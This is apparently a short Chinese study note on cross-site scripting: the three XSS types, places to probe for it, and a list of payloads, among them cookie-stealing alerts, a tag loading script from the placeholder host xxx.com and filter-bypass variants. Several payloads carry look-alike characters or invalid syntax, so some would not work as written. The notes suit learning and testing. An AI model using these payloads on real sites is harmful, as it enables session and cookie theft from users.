1.类型
反射型:大多用于盗取cookie信息
存储型:容易造成蠕虫,cookie盗窃 是高危漏洞
DOM型:不经过后端,是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,url传入参数去控制触发的,也属于反射型XSS。
2.挖掘的地方
评论区、留言区、注册信息、意见反馈、搜索框、URL参数和URL本身
3.标签用法
<script>
<script>alert("hack")</script> #弹出hack
<script>alert(/hack/)</script> #弹出hack
<script>alert(1)</script> #弹出1,对于数字可以不用引号
<script>alert(document.cookie)</script> #弹出cookie
<script src=http://xxx.com/xss.js></script> #引用外部的xss
svg
<svg onload="alert(1)">
<svg onload="alert(1)"//
<img>
<img src=1 οnerrοr=alert("hack")>
<img src=1 οnerrοr=alert(document.cookie)> #弹出cookie
<img src="javascript:alert('hack');">
<body>
<body οnlοad=alert(1)>
<body οnpageshοw=alert(1)>
<body background="javascript:alert('1')">
video style input
<video οnlοadstart=alert(1) src="/http:192.168.xxx.xxx/video/2.mp4" />
<style οnlοad=alert(1)></style>
<input onfocus="alert('1');">
弹窗函数
<script>prompt('1')</script>
script被过滤
<sCRiPt>alert('XSS')</ScRIpT> #大小写
<scriscriptpt>alert('xss')</scriscriptpt> #双写
<scr<script>ipt>alert('xss')</scr</script>ipt> #嵌套
<0x736372697074>alert('XSS')</0x736372697074> #十六进制编码
"><script>alert('XSS')</script> #闭合标签
%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E #url编码
%3Cscript%3alert(document.cookie);%3C%2Fscript%3 #标签被过滤
<img/src="x"/onerror=alert("xss");> #空格被过滤
4.xss漏洞利用
可以看这位大佬的文章 http://t.csdnimg.cn/HOdTV